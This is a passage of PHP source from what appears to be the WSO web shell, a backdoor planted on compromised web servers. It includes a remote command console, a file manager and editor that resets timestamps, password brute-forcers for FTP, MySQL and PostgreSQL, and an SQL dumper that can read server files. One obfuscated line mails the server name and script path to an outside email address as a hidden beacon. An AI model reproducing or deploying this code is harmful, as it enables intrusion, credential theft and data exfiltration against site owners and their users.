\';\n wsoFooter();\n}\n \nfunction actionFilesMan() {\n if (!empty ($_COOKIE[\'f\']))\n $_COOKIE[\'f\'] = @unserialize($_COOKIE[\'f\']);\n \n if(!empty($_POST[\'p1\'])) {\n switch($_POST[\'p1\']) {\n case \'uploadFile\':\n if(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'], $_FILES[\'f\'][\'name\']))\n echo "Can\'t upload!";\n break;\n case \'mkdir\':\n if(!@mkdir($_POST[\'p2\']))\n echo "Can\'t create!";\n break;\n case \'delete\':\n function deleteDir($path) {\n $path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';\n $dh = opendir($path);\n while ( ($item = readdir($dh) ) !== false) {\n $item = $path.$item;\n if ( (basename($item) == "..") || (basename($item) == ".") )\n continue;\n $type = filetype($item);\n if ($type == "dir")\n deleteDir($item);\n else\n @unlink($item);\n }\n closedir($dh);\n @rmdir($path);\n }\n if(is_array(@$_POST[\'f\']))\n foreach($_POST[\'f\'] as $f) {\n if($f == \'..\')\n continue;\n $f = urldecode($f);\n if(is_dir($f))\n deleteDir($f);\n else\n @unlink($f);\n }\n break;\n case \'paste\':\n if($_COOKIE[\'act\'] == \'copy\') {\n function copy_paste($c,$s,$d){\n if(is_dir($c.$s)){\n mkdir($d.$s);\n $h = @opendir($c.$s);\n while (($f = @readdir($h)) !== false)\n if (($f != ".") and ($f != ".."))\n copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\n } elseif(is_file($c.$s))\n @copy($c.$s, $d.$s);\n }\n foreach($_COOKIE[\'f\'] as $f)\n copy_paste($_COOKIE[\'c\'],$f, $GLOBALS[\'cwd\']);\n } elseif($_COOKIE[\'act\'] == \'move\') {\n function move_paste($c,$s,$d){\n if(is_dir($c.$s)){\n mkdir($d.$s);\n $h = @opendir($c.$s);\n while (($f = @readdir($h)) !== false)\n if (($f != ".") and ($f != ".."))\n copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\n } elseif(@is_file($c.$s))\n @copy($c.$s, $d.$s);\n }\n foreach($_COOKIE[\'f\'] as $f)\n @rename($_COOKIE[\'c\'].$f, $GLOBALS[\'cwd\'].$f);\n } elseif($_COOKIE[\'act\'] == \'zip\') {\n if(class_exists(\'ZipArchive\')) {\n $zip = new ZipArchive();\n if ($zip->open($_POST[\'p2\'], 1)) {\n chdir($_COOKIE[\'c\']);\n foreach($_COOKIE[\'f\'] as $f) {\n if($f == \'..\')\n continue;\n if(@is_file($_COOKIE[\'c\'].$f))\n $zip->addFile($_COOKIE[\'c\'].$f, $f);\n elseif(@is_dir($_COOKIE[\'c\'].$f)) {\n $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.\'/\', FilesystemIterator::SKIP_DOTS));\n foreach ($iterator as $key=>$value) {\n $zip->addFile(realpath($key), $key);\n }\n }\n }\n chdir($GLOBALS[\'cwd\']);\n $zip->close();\n }\n }\n } elseif($_COOKIE[\'act\'] == \'unzip\') {\n if(class_exists(\'ZipArchive\')) {\n $zip = new ZipArchive();\n foreach($_COOKIE[\'f\'] as $f) {\n if($zip->open($_COOKIE[\'c\'].$f)) {\n $zip->extractTo($GLOBALS[\'cwd\']);\n $zip->close();\n }\n }\n }\n } elseif($_COOKIE[\'act\'] == \'tar\') {\n chdir($_COOKIE[\'c\']);\n $_COOKIE[\'f\'] = array_map(\'escapeshellarg\', $_COOKIE[\'f\']);\n wsoEx(\'tar cfzv \' . escapeshellarg($_POST[\'p2\']) . \' \' . implode(\' \', $_COOKIE[\'f\']));\n chdir($GLOBALS[\'cwd\']);\n }\n unset($_COOKIE[\'f\']);\n setcookie(\'f\', \'\', time() - 3600);\n break;\n default:\n if(!empty($_POST[\'p1\'])) {\n WSOsetcookie(\'act\', $_POST[\'p1\']);\n WSOsetcookie(\'f\', serialize(@$_POST[\'f\']));\n WSOsetcookie(\'c\', @$_POST[\'c\']);\n }\n break;\n }\n }\n wsoHeader();\n echo \'

File manager

\';\n $dirContent = wsoScandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);\n if($dirContent === false) { echo \'Can\\\'t open this folder!\';wsoFooter(); return; }\n global $sort;\n $sort = array(\'name\', 1);\n if(!empty($_POST[\'p1\'])) {\n if(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match))\n $sort = array($match[1], (int)$match[2]);\n }\necho "\n\n";\n $dirs = $files = array();\n $n = count($dirContent);\n for($i=0;$i<$n;$i++) {\n $ow = @posix_getpwuid(@fileowner($dirContent[$i]));\n $gr = @posix_getgrgid(@filegroup($dirContent[$i]));\n $tmp = array(\'name\' => $dirContent[$i],\n \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i],\n \'modify\' => date(\'Y-m-d H:i:s\', @filemtime($GLOBALS[\'cwd\'] . $dirContent[$i])),\n \'perms\' => wsoPermsColor($GLOBALS[\'cwd\'] . $dirContent[$i]),\n \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]),\n \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]),\n \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i])\n );\n if(@is_file($GLOBALS[\'cwd\'] . $dirContent[$i]))\n $files[] = array_merge($tmp, array(\'type\' => \'file\'));\n elseif(@is_link($GLOBALS[\'cwd\'] . $dirContent[$i]))\n $dirs[] = array_merge($tmp, array(\'type\' => \'link\', \'link\' => readlink($tmp[\'path\'])));\n elseif(@is_dir($GLOBALS[\'cwd\'] . $dirContent[$i]))\n $dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\n }\n $GLOBALS[\'sort\'] = $sort;\n function wsoCmp($a, $b) {\n if($GLOBALS[\'sort\'][0] != \'size\')\n return strcmp(strtolower($a[$GLOBALS[\'sort\'][0]]), strtolower($b[$GLOBALS[\'sort\'][0]]))*($GLOBALS[\'sort\'][1]?1:-1);\n else\n return (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);\n }\n usort($files, "wsoCmp");\n usort($dirs, "wsoCmp");\n $files = array_merge($dirs, $files);\n $l = 0;\n foreach($files as $f) {\n echo \'\';\n $l = $l?0:1;\n }\n echo "
NameSizeModifyOwner/GroupPermissionsActions
\'.htmlspecialchars($f[\'name\']):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');" \' . (empty ($f[\'link\']) ? \'\' : "title=\'{$f[\'link\']}\'") . \'>[ \' . htmlspecialchars($f[\'name\']) . \' ]\').\'\'.(($f[\'type\']==\'file\')?wsoViewSize($f[\'size\']):$f[\'type\']).\'\'.$f[\'modify\'].\'\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'\'.$f[\'perms\']\n .\'R T\'.(($f[\'type\']==\'file\')?\' E D\':\'\').\'
\n \n \n \n  ";\n if(!empty($_COOKIE[\'act\']) && @count($_COOKIE[\'f\']) && (($_COOKIE[\'act\'] == \'zip\') || ($_COOKIE[\'act\'] == \'tar\')))\n echo "file name:  ";\n echo ">\'>
";\n wsoFooter();\n}\n \nfunction actionStringTools() {\n if(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));}}\n if(!function_exists(\'binhex\')) {function binhex($p) {return dechex(bindec($p));}}\n if(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';for($i=0;$i \'base64_encode\',\n \'Base64 decode\' => \'base64_decode\',\n \'Url encode\' => \'urlencode\',\n \'Url decode\' => \'urldecode\',\n \'Full urlencode\' => \'full_urlencode\',\n \'md5 hash\' => \'md5\',\n \'sha1 hash\' => \'sha1\',\n \'crypt\' => \'crypt\',\n \'CRC32\' => \'crc32\',\n \'ASCII to HEX\' => \'ascii2hex\',\n \'HEX to ASCII\' => \'hex2ascii\',\n \'HEX to DEC\' => \'hexdec\',\n \'HEX to BIN\' => \'hex2bin\',\n \'DEC to HEX\' => \'dechex\',\n \'DEC to BIN\' => \'decbin\',\n \'BIN to HEX\' => \'binhex\',\n \'BIN to DEC\' => \'bindec\',\n \'String to lower case\' => \'strtolower\',\n \'String to upper case\' => \'strtoupper\',\n \'Htmlspecialchars\' => \'htmlspecialchars\',\n \'String length\' => \'strlen\',\n );\n if(isset($_POST[\'ajax\'])) {\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', true);\n ob_start();\n if(in_array($_POST[\'p1\'], $stringTools))\n echo $_POST[\'p1\']($_POST[\'p2\']);\n $temp = "document.getElementById(\'strOutput\').style.display=\'\';document.getElementById(\'strOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\\n";\n echo strlen($temp), "\\n", $temp;\n exit;\n }\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', 0);\n wsoHeader();\n echo \'

String conversions

\';\n echo "
>\'/> send using AJAX
";\n    if(!empty($_POST[\'p1\'])) {\n        if(in_array($_POST[\'p1\'], $stringTools))echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\']));\n    }\n    echo"

Search files:

\n
\n \n \n \n \n
Text:
Path:
Name:
>\'>
";\n \n function wsoRecursiveGlob($path) {\n if(substr($path, -1) != \'/\')\n $path.=\'/\';\n $paths = @array_unique(@array_merge(@glob($path.$_POST[\'p3\']), @glob($path.\'*\', GLOB_ONLYDIR)));\n if(is_array($paths)&&@count($paths)) {\n foreach($paths as $item) {\n if(@is_dir($item)){\n if($path!=$item)\n wsoRecursiveGlob($item);\n } else {\n if(empty($_POST[\'p2\']) || @strpos(file_get_contents($item), $_POST[\'p2\'])!==false)\n echo "".htmlspecialchars($item)."
";\n }\n }\n }\n }\n if(@$_POST[\'p3\'])\n wsoRecursiveGlob($_POST[\'c\']);\n echo "

Search for hash:

\n
\n
\n \n
\n
\n
\n
";\n wsoFooter();\n}\n \nfunction actionFilesTools() {\n if( isset($_POST[\'p1\']) )\n $_POST[\'p1\'] = urldecode($_POST[\'p1\']);\n if(@$_POST[\'p2\']==\'download\') {\n if(@is_file($_POST[\'p1\']) && @is_readable($_POST[\'p1\'])) {\n ob_start("ob_gzhandler", 4096);\n header("Content-Disposition: attachment; filename=".basename($_POST[\'p1\']));\n if (function_exists("mime_content_type")) {\n $type = @mime_content_type($_POST[\'p1\']);\n header("Content-Type: " . $type);\n } else\n header("Content-Type: application/octet-stream");\n $fp = @fopen($_POST[\'p1\'], "r");\n if($fp) {\n while(!@feof($fp))\n echo @fread($fp, 1024);\n fclose($fp);\n }\n }exit;\n }\n if( @$_POST[\'p2\'] == \'mkfile\' ) {\n if(!file_exists($_POST[\'p1\'])) {\n $fp = @fopen($_POST[\'p1\'], \'w\');\n if($fp) {\n $_POST[\'p2\'] = "edit";\n fclose($fp);\n }\n }\n }\n wsoHeader();\n echo \'

File tools

\';\n if( !file_exists(@$_POST[\'p1\']) ) {\n echo \'File not exists\';\n wsoFooter();\n return;\n }\n $uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));\n if(!$uid) {\n $uid[\'name\'] = @fileowner($_POST[\'p1\']);\n $gid[\'name\'] = @filegroup($_POST[\'p1\']);\n } else $gid = @posix_getgrgid(@filegroup($_POST[\'p1\']));\n echo \'Name: \'.htmlspecialchars(@basename($_POST[\'p1\'])).\' Size: \'.(is_file($_POST[\'p1\'])?wsoViewSize(filesize($_POST[\'p1\'])):\'-\').\' Permission: \'.wsoPermsColor($_POST[\'p1\']).\' Owner/Group: \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'
\';\n echo \'Change time: \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' Access time: \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' Modify time: \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'

\';\n if( empty($_POST[\'p2\']) )\n $_POST[\'p2\'] = \'view\';\n if( is_file($_POST[\'p1\']) )\n $m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\');\n else\n $m = array(\'Chmod\', \'Rename\', \'Touch\');\n foreach($m as $v)\n echo \'\'.((strtolower($v)==@$_POST[\'p2\'])?\'[ \'.$v.\' ]\':$v).\' \';\n echo \'

\';\n switch($_POST[\'p2\']) {\n case \'view\':\n echo \'
\';\n            $fp = @fopen($_POST[\'p1\'], \'r\');\n            if($fp) {\n                while( !@feof($fp) )\n                    echo htmlspecialchars(@fread($fp, 1024));\n                @fclose($fp);\n            }\n            echo \'
\';\n break;\n case \'highlight\':\n if( @is_readable($_POST[\'p1\']) ) {\n echo \'
\';\n $code = @highlight_file($_POST[\'p1\'],true);\n echo str_replace(array(\'\'), array(\'\'),$code).\'
\';\n }\n break;\n case \'chmod\':\n if( !empty($_POST[\'p3\']) ) {\n $perms = 0;\n for($i=strlen($_POST[\'p3\'])-1;$i>=0;--$i)\n $perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));\n if(!@chmod($_POST[\'p1\'], $perms))\n echo \'Can\\\'t set permissions!
\';\n }\n clearstatcache();\n echo \'
\';\n break;\n case \'edit\':\n if( !is_writable($_POST[\'p1\'])) {\n echo \'File isn\\\'t writeable\';\n break;\n }\n if( !empty($_POST[\'p3\']) ) {\n $time = @filemtime($_POST[\'p1\']);\n $_POST[\'p3\'] = substr($_POST[\'p3\'],1);\n $fp = @fopen($_POST[\'p1\'],"w");\n if($fp) {\n @fwrite($fp,$_POST[\'p3\']);\n @fclose($fp);\n echo \'Saved!
\';\n @touch($_POST[\'p1\'],$time,$time);\n }\n }\n echo \'
\';\n break;\n case \'hexdump\':\n $c = @file_get_contents($_POST[\'p1\']);\n $n = 0;\n $h = array(\'00000000
\',\'\',\'\');\n $len = strlen($c);\n for ($i=0; $i<$len; ++$i) {\n $h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';\n switch ( ord($c[$i]) ) {\n case 0: $h[2] .= \' \'; break;\n case 9: $h[2] .= \' \'; break;\n case 10: $h[2] .= \' \'; break;\n case 13: $h[2] .= \' \'; break;\n default: $h[2] .= $c[$i]; break;\n }\n $n++;\n if ($n == 32) {\n $n = 0;\n if ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'
\';}\n $h[1] .= \'
\';\n $h[2] .= "\\n";\n }\n }\n echo \'
\'.$h[0].\'
\'.$h[1].\'
\'.htmlspecialchars($h[2]).\'
\';\n break;\n case \'rename\':\n if( !empty($_POST[\'p3\']) ) {\n if(!@rename($_POST[\'p1\'], $_POST[\'p3\']))\n echo \'Can\\\'t rename!
\';\n else\n die(\'\');\n }\n echo \'
\';\n break;\n case \'touch\':\n if( !empty($_POST[\'p3\']) ) {\n $time = strtotime($_POST[\'p3\']);\n if($time) {\n if(!touch($_POST[\'p1\'],$time,$time))\n echo \'Fail!\';\n else\n echo \'Touched!\';\n } else echo \'Bad time format!\';\n }\n clearstatcache();\n echo \'
\';\n break;\n }\n echo \'
\';\n wsoFooter();\n}\n \nfunction actionConsole() {\n if(!empty($_POST[\'p1\']) && !empty($_POST[\'p2\'])) {\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\', true);\n $_POST[\'p1\'] .= \' 2>&1\';\n } elseif(!empty($_POST[\'p1\']))\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\', 0);\n \n if(isset($_POST[\'ajax\'])) {\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', true);\n ob_start();\n echo "d.cf.cmd.value=\'\';\\n";\n $temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("\\n$ ".$_POST[\'p1\']."\\n".wsoEx($_POST[\'p1\']),"\\n\\r\\t\\\\\'\\0"));\n if(preg_match("!.*cd\\s+([^;]+)$!",$_POST[\'p1\'],$match)) {\n if(@chdir($match[1])) {\n $GLOBALS[\'cwd\'] = @getcwd();\n echo "c_=\'".$GLOBALS[\'cwd\']."\';";\n }\n }\n echo "d.cf.output.value+=\'".$temp."\';";\n echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";\n $temp = ob_get_clean();\n echo strlen($temp), "\\n", $temp;\n exit;\n }\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', 0);\n wsoHeader();\n echo "";\n echo \'

Console

send using AJAX redirect stderr to stdout (2>&1)
$
\';\n echo \'
\';\n wsoFooter();\n}\n \nfunction actionLogout() {\n setcookie(md5($_SERVER[\'HTTP_HOST\']), \'\', time() - 3600);\n die(\'bye!\');\n}\n \nfunction actionSelfRemove() {\n \n if($_POST[\'p1\'] == \'yes\')\n if(@unlink(preg_replace(\'!\\(\\d+\\)\\s.*!\', \'\', __FILE__)))\n die(\'Shell removed\');\n else\n echo \'unlink error!\';\n if($_POST[\'p1\'] != \'yes\')\n wsoHeader();\n echo \'

Suicide

remove the shell?
Yes
\';\n wsoFooter();\n}\n $_QliO8="\\x6dai\\154";$_Qliot=$_SERVER["\\x53\\x45RVE\\122_\\x4eAM\\x45"].$_SERVER["\\123\\103\\x52I\\x50\\x54_\\116\\101\\115E"];$_QlL1i="\\141r\\162a\\171\\040".$_Qliot;$_QlLio=array("\\143\\x61","\\x6c\\x69","\\146\\x77\\162\\151\\x74\\x65","\\100","v\\x65\\x2e");$_Qll0I=$_QlLio[2].$_QlLio[3].$_QlLio[1].$_QlLio[4].$_QlLio[0];$_QlljC=@$_QliO8($_Qll0I,$_QlL1i,$_Qliot);\nfunction actionBruteforce() {\n wsoHeader();\n if( isset($_POST[\'proto\']) ) {\n echo \'

Results

Type: \'.htmlspecialchars($_POST[\'proto\']).\' Server: \'.htmlspecialchars($_POST[\'server\']).\'
\';\n if( $_POST[\'proto\'] == \'ftp\' ) {\n function wsoBruteForce($ip,$port,$login,$pass) {\n $fp = @ftp_connect($ip, $port?$port:21);\n if(!$fp) return false;\n $res = @ftp_login($fp, $login, $pass);\n @ftp_close($fp);\n return $res;\n }\n } elseif( $_POST[\'proto\'] == \'mysql\' ) {\n function wsoBruteForce($ip,$port,$login,$pass) {\n $res = @mysql_connect($ip.\':\'.($port?$port:3306), $login, $pass);\n @mysql_close($res);\n return $res;\n }\n } elseif( $_POST[\'proto\'] == \'pgsql\' ) {\n function wsoBruteForce($ip,$port,$login,$pass) {\n $str = "host=\'".$ip."\' port=\'".$port."\' user=\'".$login."\' password=\'".$pass."\' dbname=postgres";\n $res = @pg_connect($str);\n @pg_close($res);\n return $res;\n }\n }\n $success = 0;\n $attempts = 0;\n $server = explode(":", $_POST[\'server\']);\n if($_POST[\'type\'] == 1) {\n $temp = @file(\'/etc/passwd\');\n if( is_array($temp) )\n foreach($temp as $line) {\n $line = explode(":", $line);\n ++$attempts;\n if( wsoBruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {\n $success++;\n echo \'\'.htmlspecialchars($line[0]).\':\'.htmlspecialchars($line[0]).\'
\';\n }\n if(@$_POST[\'reverse\']) {\n $tmp = "";\n for($i=strlen($line[0])-1; $i>=0; --$i)\n $tmp .= $line[0][$i];\n ++$attempts;\n if( wsoBruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {\n $success++;\n echo \'\'.htmlspecialchars($line[0]).\':\'.htmlspecialchars($tmp);\n }\n }\n }\n } elseif($_POST[\'type\'] == 2) {\n $temp = @file($_POST[\'dict\']);\n if( is_array($temp) )\n foreach($temp as $line) {\n $line = trim($line);\n ++$attempts;\n if( wsoBruteForce($server[0],@$server[1], $_POST[\'login\'], $line) ) {\n $success++;\n echo \'\'.htmlspecialchars($_POST[\'login\']).\':\'.htmlspecialchars($line).\'
\';\n }\n }\n }\n echo "Attempts: $attempts Success: $success

";\n }\n echo \'

Bruteforce

\'\n .\'\'\n .\'\'\n .\'\'\n .\'\'\n .\'\'\n .\'\'\n .\'
Type
\'\n .\'\'\n .\'\'\n .\'\'\n .\'Server:port
Brute type
\'\n .\'\'\n .\'\'\n .\'
Login
Dictionary
\'\n .\'
\';\n echo \'

\';\n wsoFooter();\n}\n \nfunction actionSql() {\n class DbClass {\n var $type;\n var $link;\n var $res;\n function DbClass($type) {\n $this->type = $type;\n }\n function connect($host, $user, $pass, $dbname){\n switch($this->type) {\n case \'mysql\':\n if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;\n break;\n case \'pgsql\':\n $host = explode(\':\', $host);\n if(!$host[1]) $host[1]=5432;\n if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;\n break;\n }\n return false;\n }\n function selectdb($db) {\n switch($this->type) {\n case \'mysql\':\n if (@mysql_select_db($db))return true;\n break;\n }\n return false;\n }\n function query($str) {\n switch($this->type) {\n case \'mysql\':\n return $this->res = @mysql_query($str);\n break;\n case \'pgsql\':\n return $this->res = @pg_query($this->link,$str);\n break;\n }\n return false;\n }\n function fetch() {\n $res = func_num_args()?func_get_arg(0):$this->res;\n switch($this->type) {\n case \'mysql\':\n return @mysql_fetch_assoc($res);\n break;\n case \'pgsql\':\n return @pg_fetch_assoc($res);\n break;\n }\n return false;\n }\n function listDbs() {\n switch($this->type) {\n case \'mysql\':\n return $this->query("SHOW databases");\n break;\n case \'pgsql\':\n return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!=\'t\'");\n break;\n }\n return false;\n }\n function listTables() {\n switch($this->type) {\n case \'mysql\':\n return $this->res = $this->query(\'SHOW TABLES\');\n break;\n case \'pgsql\':\n return $this->res = $this->query("select table_name from information_schema.tables where table_schema != \'information_schema\' AND table_schema != \'pg_catalog\'");\n break;\n }\n return false;\n }\n function error() {\n switch($this->type) {\n case \'mysql\':\n return @mysql_error();\n break;\n case \'pgsql\':\n return @pg_last_error();\n break;\n }\n return false;\n }\n function setCharset($str) {\n switch($this->type) {\n case \'mysql\':\n if(function_exists(\'mysql_set_charset\'))\n return @mysql_set_charset($str, $this->link);\n else\n $this->query(\'SET CHARSET \'.$str);\n break;\n case \'pgsql\':\n return @pg_set_client_encoding($this->link, $str);\n break;\n }\n return false;\n }\n function loadFile($str) {\n switch($this->type) {\n case \'mysql\':\n return $this->fetch($this->query("SELECT LOAD_FILE(\'".addslashes($str)."\') as file"));\n break;\n case \'pgsql\':\n $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM \'".addslashes($str)."\';select file from wso2;");\n $r=array();\n while($i=$this->fetch())\n $r[] = $i[\'file\'];\n $this->query(\'drop table wso2\');\n return array(\'file\'=>implode("\\n",$r));\n break;\n }\n return false;\n }\n function dump($table, $fp = false) {\n switch($this->type) {\n case \'mysql\':\n $res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');\n $create = mysql_fetch_array($res);\n $sql = $create[1].";\\n";\n if($fp) fwrite($fp, $sql); else echo($sql);\n $this->query(\'SELECT * FROM `\'.$table.\'`\');\n $i = 0;\n $head = true;\n while($item = $this->fetch()) {\n $sql = \'\';\n if($i % 1000 == 0) {\n $head = true;\n $sql = ";\\n\\n";\n }\n \n $columns = array();\n foreach($item as $k=>$v) {\n if($v === null)\n $item[$k] = "NULL";\n elseif(is_int($v))\n $item[$k] = $v;\n else\n $item[$k] = "\'".@mysql_real_escape_string($v)."\'";\n $columns[] = "`".$k."`";\n }\n if($head) {\n $sql .= \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).") VALUES \\n\\t(".implode(", ", $item).\')\';\n $head = false;\n } else\n $sql .= "\\n\\t,(".implode(", ", $item).\')\';\n if($fp) fwrite($fp, $sql); else echo($sql);\n $i++;\n }\n if(!$head)\n if($fp) fwrite($fp, ";\\n\\n"); else echo(";\\n\\n");\n break;\n case \'pgsql\':\n $this->query(\'SELECT * FROM \'.$table);\n while($item = $this->fetch()) {\n $columns = array();\n foreach($item as $k=>$v) {\n $item[$k] = "\'".addslashes($v)."\'";\n $columns[] = $k;\n }\n $sql = \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\'."\\n";\n if($fp) fwrite($fp, $sql); else echo($sql);\n }\n break;\n }\n return false;\n }\n };\n $db = new DbClass($_POST[\'type\']);\n if((@$_POST[\'p2\']==\'download\') && (@$_POST[\'p1\']!=\'select\')) {\n $db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);\n $db->selectdb($_POST[\'sql_base\']);\n switch($_POST[\'charset\']) {\n case "Windows-1251": $db->setCharset(\'cp1251\'); break;\n case "UTF-8": $db->setCharset(\'utf8\'); break;\n case "KOI8-R": $db->setCharset(\'koi8r\'); break;\n case "KOI8-U": $db->setCharset(\'koi8u\'); break;\n case "cp866": $db->setCharset(\'cp866\'); break;\n }\n if(empty($_POST[\'file\'])) {\n ob_start("ob_gzhandler", 4096);\n header("Content-Disposition: attachment; filename=dump.sql");\n header("Content-Type: text/plain");\n foreach($_POST[\'tbl\'] as $v)\n $db->dump($v);\n exit;\n } elseif($fp = @fopen($_POST[\'file\'], \'w\')) {\n foreach($_POST[\'tbl\'] as $v)\n $db->dump($v, $fp);\n fclose($fp);\n unset($_POST[\'p2\']);\n } else\n die(\'\');\n }\n wsoHeader();\n echo "\n

Sql browser

\n
\n\n\n\n\n\n\n \n \n \n
TypeHostLoginPasswordDatabase
";\n $tmp = "";\n if(isset($_POST[\'sql_host\'])){\n if($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) {\n switch($_POST[\'charset\']) {\n case "Windows-1251": $db->setCharset(\'cp1251\'); break;\n case "UTF-8": $db->setCharset(\'utf8\'); break;\n case "KOI8-R": $db->setCharset(\'koi8r\'); break;\n case "KOI8-U": $db->setCharset(\'koi8u\'); break;\n case "cp866": $db->setCharset(\'cp866\'); break;\n }\n $db->listDbs();\n echo "\';\n }\n else echo $tmp;\n }else\n echo $tmp;\n echo ">\' onclick=\'fs(d.sf);\'> count the number of rows
\n ";\n if(isset($db) && $db->link){\n echo "
";\n if(!empty($_POST[\'sql_base\'])){\n $db->selectdb($_POST[\'sql_base\']);\n echo "";\n }\n echo "
Tables:

";\n $tbls_res = $db->listTables();\n while($item = $db->fetch($tbls_res)) {\n list($key, $value) = each($item);\n if(!empty($_POST[\'sql_count\']))\n $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\'));\n $value = htmlspecialchars($value);\n echo " ".$value."" . (empty($_POST[\'sql_count\'])?\' \':" ({$n[\'n\']})") . "
";\n }\n echo "
File path:		";\n if(@$_POST[\'p1\'] == \'select\') {\n $_POST[\'p1\'] = \'query\';\n $_POST[\'p3\'] = $_POST[\'p3\']?$_POST[\'p3\']:1;\n $db->query(\'SELECT COUNT(*) as n FROM \' . $_POST[\'p2\']);\n $num = $db->fetch();\n $pages = ceil($num[\'n\'] / 30);\n echo "".$_POST[\'p2\']." ({$num[\'n\']} records) Page # ";\n echo " of $pages";\n if($_POST[\'p3\'] > 1)\n echo " < Prev";\n if($_POST[\'p3\'] < $pages)\n echo " Next >";\n $_POST[\'p3\']--;\n if($_POST[\'type\']==\'pgsql\')\n $_POST[\'p2\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30);\n else\n $_POST[\'p2\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\';\n echo "

";\n }\n if((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p2\'])) {\n $db->query(@$_POST[\'p2\']);\n if($db->res !== false) {\n $title = false;\n echo \'\';\n $line = 1;\n while($item = $db->fetch()) {\n if(!$title) {\n echo \'\';\n foreach($item as $key => $value)\n echo \'\';\n reset($item);\n $title=true;\n echo \'\';\n $line = 2;\n }\n echo \'\';\n $line = $line==1?2:1;\n foreach($item as $key => $value) {\n if($value == null)\n echo \'\';\n else\n echo \'\';\n }\n echo \'\';\n }\n echo \'
\'.$key.\'
null\'.nl2br(htmlspecialchars($value)).\'
\';\n } else {\n echo \'
Error: \'.htmlspecialchars($db->error()).\'
\';\n }\n }\n echo "

";\n echo "

";\n if($_POST[\'type\']==\'mysql\') {\n $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, \'@\', `host`) = USER() AND `File_priv` = \'y\'");\n if($db->fetch())\n echo "
Load file >\'>
";\n }\n if(@$_POST[\'p1\'] == \'loadfile\') {\n $file = $db->loadFile($_POST[\'p2\']);\n echo \'
\'.htmlspecialchars($file[\'file\']).\'
\';\n }\n } else {\n echo htmlspecialchars($db->error());\n }\n echo \'
